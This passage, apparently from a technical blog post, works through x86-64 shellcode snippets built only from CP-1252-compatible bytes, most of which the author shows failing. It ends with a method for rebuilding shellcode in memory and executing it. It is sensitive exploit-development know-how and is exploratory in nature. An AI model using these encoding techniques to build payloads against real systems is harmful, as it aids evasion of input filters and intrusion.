Another idea for seting EAX to 0. Clear the Carry Flag using CLC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0. Can you spot the problem? 🙂 Well, the ADD affects the Carry Flag, so that’s why it doesn’t work as intended. Of course, it might work, depending on what RBP points to and the value of CL.
"\xf8" /* clc */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xb8\x00\xff\x00\xff" /* mov eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x1d\x00\xff\x00\xff" /* sbb eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */
An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.
"\xf9" /* stc */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xb8\x00\xff\x00\xff" /* mov eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x1d\x00\xff\x00\xff" /* sbb eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */
This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.
"\x6a\x00" /* push 0 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xf9" /* stc */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x14\x00" /* adc al, 0 */
Another version to set EAX to -1. Store zero on the stack, load address into RAX and add 1. Rotate left by 31-bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is 0x99 converts to a double byte encoding.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xff\x00" /* inc dword [rax] */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x1f" /* rol dword [rax], 0x1f */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x99" /* cdq */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x92" /* xchg eax, edx */
I examined various ways to simulate instructions and conceded it could only work using self-modifying code. Using boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address of where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. There’s no JMP, Jcc or CALL instructions that can be used directly.
If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.
"\x39\xd8" /* cmp eax, ebx */
There’s no simple combination of registers used with CMP or SUB that’s compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB generates the wrong result.
"\x50" /* push rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5e" /* pop rsi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x53" /* push rbx */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5f" /* pop rdi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xa7" /* cmpsd */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x6a\x00" /* push 0 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x1c\x00" /* sbb al, 0 */ "\x50" /* push rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x18" /* rol dword ptr [rax], 0x18 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5f" /* pop rdi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */
Load 0xFF000700 into EAX. The Carry Flag (CF) is set using SAHF. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 or 0xFFFFFFFF.
"\xb8\x00\x07\x00\xff" /* mov eax, 0xff000700 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x9e" /* sahf */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x1d\x00\x07\x00\xff" /* sbb eax, 0xff000700 */ "\x00\x4d\x00" /* add byte [rbp], cl */
Two problems: SAHF is a byte we can’t use (0x9E) and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored in address rbp contains and the value of CL.
Adding -1 will subtract 1 from the variable EAX contains the address of.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x83\x00\xff" /* add dword [eax], -1 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
Works fine, but because 0x83 converts to a double-byte encoding, we can’t use it.
Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into rdi. Store AL in variable four times before loading into RAX. Doesn’t work once the addition after STC is executed.
"\xf9" /* stc */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x1c\x00" /* sbb al, 0 */ "\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5f" /* pop rdi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xaa" /* stosb */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
The next snippet simply copies the value of RCX to RAX. It’s overcomplicated and the POP QWORD instruction might be useful in some scenario. I just didn’t find it useful.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x51" /* push rcx */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x8f\x00" /* pop qword [rax] */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5f" /* pop rax */
Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32-bits of a 64-bit register, so to perform addition and subtraction on addresses, ADD and SUB of 32-bit registers isn’t useful.
push 0 pop rcx xnop push rbp ; save rbp xnop ; 1. ==================================== push 0 ; store 0 as X push rsp ; store &X xnop pop rbp ; load &X xnop ; 2. ==================================== mov eax, 0xFF001200 ; load 0xFF001200 add [rbp], ah ; add 0x12 adc al, 0 ; AL = CF push rbp ; store &X xnop push rsp ; store &&X xnop pop rax ; load &&X xnop inc dword[rax] ; &X++ pop rbp xnop add [rbp], al ; add CF ; 3. ====================================
Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, table 2 in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero because anything that uses it requires a REX prefix. I’m leaving here in the event R8 is already zero..
; read byte from table 2 lodsb add [rbp], cl add byte[rax+r8+1], al ; copy to table 1 add [rbp], cl lodsb add [rbp], cl add byte[rax+r8+3], al add [rbp], cl lodsb add [rbp], cl add byte[rax+r8+5], al add [rbp], cl ; and so on.. ; execute push rax ret
Using the above instruction to add 8-bits to 32-bit word.
; step 1 push rax ; save pointer add byte[rbp], cl add byte[rax+r8], bl ; A[0] += B[0] mov al, 0 adc al, 0 ; set carry add byte[rbp], cl push rax ; save carry add byte[rbp], cl pop rcx ; load carry into CL add byte[rbp], cl pop rax ; restore pointer add byte[rbp], cl ; step 2 push rax ; save pointer add byte[rbp], cl rol dword[rax], 24 add byte[rbp], cl add byte[rax+r8], cl ; A[1] += CF mov al, 0 adc al, 0 ; set carry add byte[rbp], cl push rax ; save carry add byte[rbp], cl pop rcx ; load carry into CL add byte[rbp], cl pop rax ; restore pointer add byte[rbp], cl ; step 3 push rax ; save pointer add byte[rbp], cl rol dword[rax], 24 add byte[rbp], cl add byte[rax+r8], cl ; A[2] += CF mov al, 0 adc al, 0 ; set carry add byte[rbp], cl push rax ; save carry add byte[rbp], cl pop rcx ; load carry into CL add byte[rbp], cl pop rax ; restore pointer add byte[rbp], cl ; step 4 push rax ; save pointer add byte[rbp], cl rol dword[rax], 24 add byte[rbp], cl add byte[rax+r8], cl ; A[3] += CF mov al, 0 adc al, 0 ; set carry add byte[rbp], cl push rax ; save carry add byte[rbp], cl pop rcx ; load carry into CL add byte[rbp], cl pop rax ; restore pointer add byte[rbp], cl ; step 5 rol dword[rax], 24 add byte[rbp], cl
As you can see, it’s a mess to try simulate instructions instead of just writing the code to memory and executing that way…or use CF_UNICODETEXT for copying to the clipboard. 😉